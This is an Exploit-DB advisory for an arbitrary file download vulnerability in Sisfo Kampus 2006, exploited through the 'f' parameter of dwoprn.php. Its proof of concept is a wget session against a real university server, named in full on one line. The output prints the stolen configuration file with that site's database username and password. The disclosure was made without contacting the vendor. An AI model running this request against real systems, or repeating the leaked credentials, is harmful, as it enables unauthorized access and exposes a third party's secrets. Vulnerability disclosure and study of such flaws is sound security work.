Sisfo Kampus 2006 - 'dwoprn.php?f' Arbitrary File Download

EDB-ID:

4386


Author:

k-one

Type:

webapps


Platform:

PHP

Date:

2007-09-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

original File name : PUPET-SisfoKampus2006.txt

date releases      : September 10, 2007

 

Information :

=========================

Advisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability

Author: k-one A.K.A PUPET

Website vendor : http://sisfokampus.net/

Problem : All Local File can downloaded


POC :

=========================

 

http://[h0sT]/[dir]/dwoprn.php?f=connectdb.php

 

 

[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php

--07:30:16--  http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php

           => `dwoprn.php?f=connectdb.php'

Resolving ***.*****-subang.ac.id... 203.130.***.**

Connecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 292 [application/dwoprn]

 

100%[====================================================================================================================================================================>] 292           --.--K/s

 

07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]

 

[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php

<?php

  // file: connectdb.php

  // author: E. Setio Dewo, Maret 2003

 

  $db_username = "t26924_siak";

  $db_hostname = "localhost";

  $db_password = "siakang";

  $db_name = "t26924_siak";

 

  $con = _connect($db_hostname, $db_username, $db_password);

  $db  = _select_db($db_name, $con);

 

?>

Vendor Response:

==============

Not contacted yet

 

Patch :

=============

No Patch Available

This bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)

# milw0rm.com [2007-09-10]